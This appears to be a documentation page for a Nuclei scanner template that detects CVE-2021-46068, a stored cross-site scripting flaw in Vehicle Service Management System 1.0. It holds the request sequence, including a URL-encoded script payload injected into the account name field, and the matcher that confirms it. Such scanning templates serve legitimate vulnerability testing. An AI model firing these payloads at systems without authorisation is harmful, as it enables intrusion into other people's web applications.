Vehicle Service Management System - Stored Cross-Site Scripting
ID: CVE-2021-46068
Severity: medium
Author: TenBird
Tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project
Description
Section titled “Description”A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
YAML Source
Section titled “YAML Source”id: CVE-2021-46068
info: name: Vehicle Service Management System - Stored Cross-Site Scripting author: TenBird severity: medium description: | A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS - https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2021-46068 - https://github.com/zecool/cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2021-46068 cwe-id: CWE-79 epss-score: 0.00084 epss-percentile: 0.34354 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: vehicle_service_management_system_project product: vehicle_service_management_system tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project
http: - raw: - | POST /classes/Login.php?f=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{username}}&password={{password}} - | POST /classes/Users.php?f=save HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
id=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin - | GET /admin/?page=user HTTP/1.1 Host: {{Hostname}}
host-redirects: true max-redirects: 2
matchers-condition: and matchers: - type: dsl dsl: - "contains(header_3, 'text/html')" - "status_code_3 == 200" - 'contains(body_3, "Administrator\"><script>alert(document.domain)</script> Admin")' condition: and# digest: 490a00463044022041f1c24f0490ec726a5fb80ec3d314023b5a97dd2241d64f69bd455a6be5291702205a2c2f99cc25654f54f3923b33853f16bf734923c932b89bd3c531cdccce7296:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-46068.yaml"